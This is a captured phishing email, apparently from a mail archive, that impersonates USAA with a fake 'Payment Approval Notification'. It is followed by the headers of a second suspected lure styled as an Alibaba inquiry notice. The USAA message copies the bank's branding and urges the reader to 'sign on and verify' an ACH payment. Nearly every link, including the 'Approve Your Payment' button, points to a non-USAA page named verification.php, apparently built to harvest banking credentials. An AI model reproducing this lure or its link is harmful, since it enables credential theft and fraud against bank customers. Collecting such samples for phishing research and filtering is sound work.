From: "USAA" <USAA.Web.Services@imail.com>
Date: Sun, 12 Mar 2017 05:38:45 -0500
Return-Path: USAA.Web.Services@imail.com
Message-ID: <HORIZONDC12yQgeDKvP000002df@HORIZONDC12.horizon.local>
X-OriginalArrivalTime: 12 Mar 2017 10:38:51.0991 (UTC) FILETIME=[D740E670:01D29B1C]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 108

You will not see this in a MIME-aware mail reader.
--===============0991665248==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   To ensure delivery to your inbox, please add USAA.Web.Services@customerm=
ail.usaa.com to your address book.	 =

 =

   	  =

   =

  	  =

   Payment Approval Notification
  View Accounts | Privacy Promise | Contact Us
	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE  =

USAA # ending in: - XXXX
	  =

   =

  =

  =

   =

  =

 =

    Dear Customer,
A payment was transffered to your account from another US bank account usin=
g the Authomated Clearing House (ACH).

 For security reasons, We have temporarily hold the payment until necessary=
 verification is done. You are to sign on and verify your account as a mean=
s to accept the payment. Payment will be posted within 2-3 business working=
 days after your verification. =

 =

   	 Approve Your Payment
 Thank you,
USAA
 P.S. Texting and driving ... it can wait. Take the pledge to never text an=
d drive.
	  =

  =

  =

	 	 =

  	 	 	 =

   =

  Please do not reply to this e-mail. To send a secure message to USAA, ple=
ase contact us.

Privacy Promise
USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288

  =

  	 USAA means United Services Automobile Association and its insurance, ba=
nking, investment and other companies. Banks Member FDIC. Investments provi=
ded by USAA Investment Management Company and USAA Financial Advisors Inc.,=
 both registered broker dealers. 	 =

  =

  66676-0514   =



--===============0991665248==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD height=3D35 vAlign=3Dmiddle width=3D650 align=3Dcenter><FONT style=3D"F=
ONT-SIZE: 9px; COLOR: #929292" face=3D"Verdana, sans-serif">To ensure deliv=
ery to your inbox, please add <SPAN style=3D"COLOR: #68a7c5">USAA.Web.Servi=
ces@customermail.usaa.com</SPAN> to your address book.</FONT></TD>
<TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD bgColor=3Dwhite width=3D630 align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D604 border=3D0>
<TBODY>
<TR>
<TD height=3D5 colSpan=3D4></TD></TR>
<TR>
<TD height=3D45 width=3D54><A href=3D"file:///do/redirect?url=3Dhttps%253A%=
252F%252Fwww.usaa.com%252Finet%252Fent_logon%252FLogon%253FEID%253D66676-05=
14_head&amp;hmac=3D1f4d12aa54d524ae8c1062e65b84c9f1" target=3D_blank><IMG b=
order=3D0 alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/M=
edia/email_logo.gif" width=3D61 height=3D41></A></TD>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: #6d6d6d; FONT: bold 16px Arial, sans-serif" height=3D22=
 align=3Dleft><SPAN style=3D"MARGIN-TOP: 9px; DISPLAY: block">Payment Appro=
val Notification</SPAN></TD></TR>
<TR>
<TD height=3D23 align=3Dleft><NOBR><FONT size=3D1 face=3D"Verdana, sans-ser=
if"><A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"http://www.a=
si-cloud.com/wp-content/uploads/verification.php" target=3D_blank>View Acco=
unts</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"http:=
//www.asi-cloud.com/wp-content/uploads/verification.php" target=3D_blank>Pr=
ivacy Promise</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=
=3D"http://www.asi-cloud.com/wp-content/uploads/verification.php" target=3D=
_blank>Contact Us</A></FONT></NOBR></TD></TR></TBODY></TABLE></TD>
<TD height=3D45 vAlign=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_1-1.gif?EID=3D6356057937" width=3D8 hei=
ght=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" width=3D14 h=
eight=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" width=3D8 height=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D1=
4 height=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://=
content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" width=3D14=
 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#e7e7e8 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; TEXT-ALIGN: left; LINE-HEIGHT: 12px; -webkit-t=
ext-size-adjust: none" vAlign=3Dmiddle align=3Dleft><FONT style=3D"FONT-SIZ=
E: 10px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif"><STRONG>USAA=
 SECURITY ZONE</STRONG></FONT>&nbsp; <BR><FONT style=3D"FONT-SIZE: 9px; COL=
OR: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA # ending in: - XXXX=
</FONT></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dtop widt=
h=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif=
" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D51 vAlign=3Dtop wid=
th=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gi=
f" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE=
></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD height=3D1 colSpan=3D4></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0>
<TBODY>
<TR>
<TD width=3D"95%" align=3Dleft><FONT style=3D"FONT-SIZE: 12px; COLOR: #3333=
33; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">
<P style=3D"MARGIN-BOTTOM: 1em">Dear Customer,</P>A payment was transffered=
 to your account from another US bank account using the Authomated Clearing=
 House (ACH).<BR><BR>
<P style=3D"MARGIN-BOTTOM: 1em">For security reasons, We have temporarily h=
old the payment until necessary verification is done. You are to sign on an=
d verify your account as a means to accept the payment. Payment will be pos=
ted within 2-3 business working days after your verification. </P>
<TABLE height=3D15 cellSpacing=3D0 cellPadding=3D0 bgColor=3D#6cae35 border=
=3D0>
<TBODY>
<TR bgColor=3D#6cae35>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D15 align=3Dcenter><IMG src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif"=
 width=3D15 height=3D15></TD>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D134 align=3Dcenter><A style=
=3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
href=3D"http://www.asi-cloud.com/wp-content/uploads/verification.php" targe=
t=3D_blank>Approve Your Payment</A></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 1em">Thank you,<BR>USAA</P>
<P><B>P.S. Texting and driving ... it can wait. <A href=3D"http://www.asi-c=
loud.com/wp-content/uploads/verification.php" target=3D_blank>Take the pled=
ge</A> to <I>never</I> text and drive.</B></P></FONT></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD height=3D30 colSpan=3D2 align=3Dleft><BR><A href=3D"file:///do/redirect=
?url=3Dhttp%253A%252F%252Fwww.facebook.com%252FUSAA&amp;hmac=3Da6b00267bda9=
822526060f8d114c9ffe" target=3D_blank><IMG border=3D0 alt=3DFacebook src=3D=
"http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/faceboo=
kIcon.gif" width=3D32 height=3D32></A>&nbsp;&nbsp;<A href=3D"file:///do/red=
irect?url=3Dhttp%253A%252F%252Ftwitter.com%252Fusaa&amp;hmac=3Db14ac160d245=
b7e5a49e78cd9e368c20" target=3D_blank><IMG border=3D0 alt=3DTwitter src=3D"=
http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitterI=
con.gif" width=3D32 height=3D32></A></TD></TR></TBODY></TABLE></TD>
<TD width=3D5></TD>
<TD width=3D5></TD></TR>
<TR>
<TD height=3D5 width=3D10></TD>
<TD height=3D5 width=3D630></TD>
<TD height=3D5 width=3D5></TD>
<TD height=3D5 width=3D5></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD colSpan=3D4 align=3Dcenter><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d=
6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">Please do not reply to =
this e-mail. To send a secure message to USAA, please <A style=3D"TEXT-DECO=
RATION: none; COLOR: #408cb0" href=3D"http://www.asi-cloud.com/wp-content/u=
ploads/verification.php" target=3D_blank>contact us</A>.<BR><BR><A style=3D=
"COLOR: #6d6d6d" href=3D"http://www.asi-cloud.com/wp-content/uploads/verifi=
cation.php" target=3D_blank>Privacy Promise</A><BR>USAA, 9800 Fredericksbur=
g Road, San Antonio, Texas 78288<BR></FONT></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD width=3D5 align=3Dleft></TD>
<TD width=3D630 colSpan=3D2 align=3Dleft><FONT style=3D"FONT-SIZE: 10px; CO=
LOR: #6d6d6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">USAA means Un=
ited Services Automobile Association and <A style=3D"TEXT-DECORATION: none;=
 COLOR: #408cb0" href=3D"http://www.asi-cloud.com/wp-content/uploads/verifi=
cation.php" target=3D_blank>its insurance, banking, investment and other co=
mpanies</A>. Banks Member FDIC. Investments provided by USAA Investment Man=
agement Company and USAA Financial Advisors Inc., both registered broker de=
alers.</FONT> </TD>
<TD width=3D5 align=3Dleft></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD colSpan=3D4 align=3Dright><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d6=
d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">66676-0514&nbsp;&nbsp;&n=
bsp;</FONT><BR><BR></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============0991665248==--

From jose@monkey.org Fri Mar 10 01:11:59 2017 +0000
Return-Path: apache@bexter29.bexter-network.net
Delivered-To: jose@monkey.org
X-FDA: 72600511116.03.mark18_2e536c6b6f85b
X-Spam-Summary: 75,0,0,1dbf6fc1121043a5,d41d8cd98f00b204,apache@bexter29.bexter-network.net,:,RULES_HIT:4:41:72:146:355:375:379:455:495:540:541:543:800:962:967:969:973:983:988:989:1189:1208:1224:1260:1263:1313:1314:1345:1381:1431:1432:1436:1437:1516:1517:1559:1588:1589:1592:1593:1594:1714:1730:1747:1777:1792:2069:2070:2194:2199:2393:2525:2527:2559:2564:2612:2682:2685:2743:2828:2859:2933:2937:2939:2942:2945:2947:2951:2954:2975:3000:3022:3138:3139:3140:3141:3142:3148:3362:3865:3867:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4180:4181:4321:4361:5007:6238:6261:6678:8599:8603:8957:8987:9025:9080:9388:9871:10004:10049:10234:10346:10954:11026:11658:11914:12043:12050:12295:12438:12555:12663:12764:12776:12903:12956:12958:13025:13139:13439:13898:13975:14094:14096:14381:14651:14827:14829:14877:21060:21080:21212:21325:21433:21451:21524:30054:30055:30069,0,RBL:83.143.23.33-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not b
X-HE-Tag: mark18_2e536c6b6f85b
X-Filterd-Recvd-Size: 19143
Received: from bexter29.bexter-network.net (unknown [83.143.23.33])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 10 Mar 2017 01:11:58 +0000 (UTC)
Received: by bexter29.bexter-network.net (Postfix, from userid 48)
	id D858752C22C9; Thu,  9 Mar 2017 22:29:35 +0100 (CET)
To: jose@monkey.org
Subject: [Alibaba Inquiry Notification] 38 Unread Notification.
X-PHP-Originating-Script: 48:maxo.php
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
